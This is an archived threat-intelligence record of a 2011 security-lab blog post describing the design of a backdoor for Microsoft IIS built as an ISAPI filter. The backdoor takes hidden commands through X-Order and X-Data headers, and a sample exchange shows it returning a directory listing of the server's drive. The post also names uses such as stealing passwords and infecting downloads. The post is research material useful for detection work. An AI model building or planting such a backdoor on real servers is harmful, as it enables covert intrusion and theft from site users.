{
	"id": "7c19f6e3-0f32-4a83-af4a-a29cd84bd8e4",
	"created_at": "2026-04-06T01:29:52.403053Z",
	"updated_at": "2026-04-10T13:11:42.863012Z",
	"deleted_at": null,
	"sha1_hash": "57ef03ebb506d435c599ac93691ad7462cfc8d1e",
	"title": "Sogeti ESEC Lab",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 112840,
	"plain_text": "Sogeti ESEC Lab\r\nBy Sogeti ESEC Lab\r\nArchived: 2026-04-06 00:23:11 UTC\r\nIIS Backdoor\r\nWed 02 February 2011 by julien\r\nIn this article I will explain how I designed a rootkit for Microsoft Internet Information Services (IIS).The\r\nquestion is: why a backdoor in a web server?\r\nFirst obvious but useless answer: because we can.\r\nOk, let us give a more clever answer. The purpose of backdooring a web sever is double:\r\nIt allows the attacker to access data sent by the clients. For instance, if the web site is password protected,\r\nwe can retrieve this password.\r\nIt allows to backdoor on the fly anything sent from the server to the web client.\r\nThis second point is especially interesting as it allows the attacker to inject the proper exploit according to the web\r\nbrowser requesting the web page, or to infect an executable downloaded from the server.\r\nIIS backdoor\r\nWhat is IIS\r\nIIS is Microsoft's web server, it is an important piece of Microsoft's web base technologies such as OWA. Many\r\nversions have been released from the first (IIS 1.0 under Windows NT 3.51) to the latest (IIS 7.5 under Windows\r\nServer 2008). It is widely deployed over the Internet and companies Intranets.\r\nIIS enrichment\r\nMicrosoft has defined an API known as ISAPI (Internet Server Application Programming Interface) to help\r\ndevelopers to add features to IIS. Two types of components can be added to IIS : extensions or filters.\r\nISAPI Extensions\r\nExtensions are DLLs that export 3 functions:\r\nGetExtensionVersion\r\nHttpExtensionProc\r\nTerminateExtension\r\nhttps://web.archive.org/web/20170106175935/http:/esec-lab.sogeti.com/posts/2011/02/02/iis-backdoor.html\r\nPage 1 of 5\n\nExtensions are applications running inside IIS. They are loaded by IIS every time it needs them. Extensions access\r\nthe content of a request and are responsible for responding to the client. For exemple, if a client requests the page\r\nhttp ://mydomain/myextension where myextension is your registered extension, the HttpExtensionProc of your\r\nextension will be called. IIS will provide it the following structure :\r\ntypedef struct _EXTENSION_CONTROL_BLOCK EXTENSION_CONTROL_BLOCK {\r\n DWORD cbSize;\r\n DWORD dwVersion;\r\n HCONN connID;\r\n DWORD dwHttpStatusCode;\r\n char lpszLogData[HSE_LOG_BUFFER_LEN];\r\n LPSTR lpszMethod;\r\n LPSTR lpszQueryString;\r\n LPSTR lpszPathInfo;\r\n LPSTR lpszPathTranslated;\r\n DWORD cbTotalBytes;\r\n DWORD cbAvailable;\r\n LPBYTE lpbData;\r\n LPSTR lpszContentType;\r\n BOOL (WINAPI * GetServerVariable) ();\r\n BOOL (WINAPI * WriteClient) ();\r\n BOOL (WINAPI * ReadClient) ();\r\n BOOL (WINAPI * ServerSupportFunction) ();\r\n} EXTENSION_CONTROL_BLOCK;\r\nThis way HttpExtensionProc can read data from the request, treat it and send back a response using callback\r\nfunctions ReadClient and WriteClient.\r\nISAPI Filters\r\nFilters are DLLs that exports 3 functions:\r\nGetFilterVersion\r\nHttpFilterProc\r\nTerminateFilter\r\nFilters are registered for a number of events, each time an event occurs during the lifetime of a request, the\r\nHttpFilterProc is called. Here is an incomplete list of events that a filter can register for:\r\nSF_NOTIFY_PREPROC_HEADERS: happens when IIS has finished preprocessing headers.\r\nSF_NOTIFY_SEND_RESPONSE: happens when IIS is ready to send response to the client\r\nSF_NOTIFY_END_OF_REQUEST: happens when a request has ended its lifecycle\r\nSF_NOTIFY_LOG: happens before IIS writes log for the current request\r\nOnce an event for which a filter is registered occurs, the filter's HttpFilterProc is called and is provided a\r\nstructure, depending on the type of event. For example, if it is a SF_NOTIFY_END_OF_REQUEST event, the\r\nhttps://web.archive.org/web/20170106175935/http:/esec-lab.sogeti.com/posts/2011/02/02/iis-backdoor.html\r\nPage 2 of 5\n\nfollowing structure is passed to the filter by IIS:\r\ntypedef struct _HTTP_FILTER_LOG HTTP_FILTER_LOG {\r\n const char * pszClientHostName;\r\n const char * pszClientUserName;\r\n const char * pszServerName;\r\n const char * pszOperation;\r\n const char * pszTarget;\r\n const char * pszParameters;\r\n DWORD dwHttpStatus;\r\n DWORD dwWin32Status;\r\n DWORD dwBytesSent;\r\n DWORD dwBytesRecvd;\r\n DWORD msTimeForProcessing;\r\n} HTTP_FILTER_LOG, * PHTTP_FILTER_LOG;\r\nThis structure contains all necessary pieces of information a filter needs to log the incoming request.\r\nExtensions and Filters overview\r\nThe following scheme is a general presentation of how filters and extensions are reached by a client's request:\r\nBackdoor Implementation\r\nhttps://web.archive.org/web/20170106175935/http:/esec-lab.sogeti.com/posts/2011/02/02/iis-backdoor.html\r\nPage 3 of 5\n\nThe backdoor is working on a very simple principle. Clients send requests with special headers containing orders\r\nand the filter replies by adding data to the outgoing response. The filter is registered for\r\nSF_NOTIFY_PREPROC_HEADERS and SF_NOTIFY_SEND_RAW_DATA events. Once an incoming request\r\narrives, the filter is checking whether headers X-ORDER and/or X-DATA are present in the request, if so and if\r\nthe order is known it executes it and replies. As our filter is notified for any page of the server, I can request any\r\npage on the server to communicate with my filter. I just need to add special headers to a regular request.\r\nIf I request a simple page (here /pwet.htm) without adding headers IIS has a normal behaviour, i.e IIS response is\r\nas following:\r\nGET /pwet.htm HTTP/1.1\r\nHost: 192.168.73.143\r\nAccept-Encoding: identity\r\nConnection: Keep-Alive\r\nContent-type: application/x-www-form-urlencoded\r\nAccept: */*\r\nHTTP/1.1 200 OK\r\nDate: Thu, 03 Feb 2011 12:16:50 GMT\r\nContent-Length: 31\r\nContent-Type: text/html\r\nLast-Modified: Mon, 21 Jun 2010 11:53:19 GMT\r\nAccept-Ranges: bytes\r\nETag: \"963779573811cb1:994\"\r\nServer: Microsoft-IIS/6.0\r\n\u003chtml\u003e\r\nPouetpouet\r\n\u003c/html\u003e\r\nBut if I request the same page and add an order (here the order is \"ListDir\" of base64(\"C:\") ), then I have the\r\nfollowing result:\r\nGET /pwet.htm HTTP/1.1\r\nHost: 192.168.73.143\r\nAccept-Encoding: identity\r\nX-Order: ListDir\r\nConnection: Keep-Alive\r\nX-Data: Qzpc\r\nContent-type: application/x-www-form-urlencoded\r\nAccept: */*\r\nHTTP/1.1 200 OK\r\nhttps://web.archive.org/web/20170106175935/http:/esec-lab.sogeti.com/posts/2011/02/02/iis-backdoor.html\r\nPage 4 of 5\n\nDate: Thu, 03 Feb 2011 12:16:57 GMT\r\nContent-Length: 353\r\nX-Resp: OK\r\nContent-Type: text/html\r\nLast-Modified: Mon, 21 Jun 2010 11:53:19 GMT\r\nAccept-Ranges: bytes\r\nETag: \"963779573811cb1:994\"\r\nServer: Microsoft-IIS/6.0\r\n\u003chtml\u003e\r\nPouetpouet\r\n\u003c/html\u003e\r\n[F] C:\\AUTOEXEC.BAT\r\n[F] C:\\boot.ini\r\n[F] C:\\bootfont.bin\r\n[F] C:\\CONFIG.SYS\r\n[D] C:\\Documents and Settings\r\n[D] C:\\Inetpub\r\n[F] C:\\IO.SYS\r\n[F] C:\\MSDOS.SYS\r\n[F] C:\\NTDETECT.COM\r\n[F] C:\\ntldr\r\n[F] C:\\pagefile.sys\r\n[D] C:\\Program Files\r\n[D] C:\\System Volume Information\r\n[D] C:\\WINDOWS\r\n[D] C:\\wmpub\r\nSo, backdoring a IIS web server is not that difficult and can give you a lot of opportunities...\r\nSource: https://web.archive.org/web/20170106175935/http:/esec-lab.sogeti.com/posts/2011/02/02/iis-backdoor.html\r\nhttps://web.archive.org/web/20170106175935/http:/esec-lab.sogeti.com/posts/2011/02/02/iis-backdoor.html\r\nPage 5 of 5",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"MITRE"
	],
	"origins": [
		"web"
	],
	"references": [
		"https://web.archive.org/web/20170106175935/http:/esec-lab.sogeti.com/posts/2011/02/02/iis-backdoor.html"
	],
	"report_names": [
		"iis-backdoor.html"
	],
	"threat_actors": [],
	"ts_created_at": 1775438992,
	"ts_updated_at": 1775826702,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/57ef03ebb506d435c599ac93691ad7462cfc8d1e.pdf",
		"text": "https://archive.orkl.eu/57ef03ebb506d435c599ac93691ad7462cfc8d1e.txt",
		"img": "https://archive.orkl.eu/57ef03ebb506d435c599ac93691ad7462cfc8d1e.jpg"
	}
}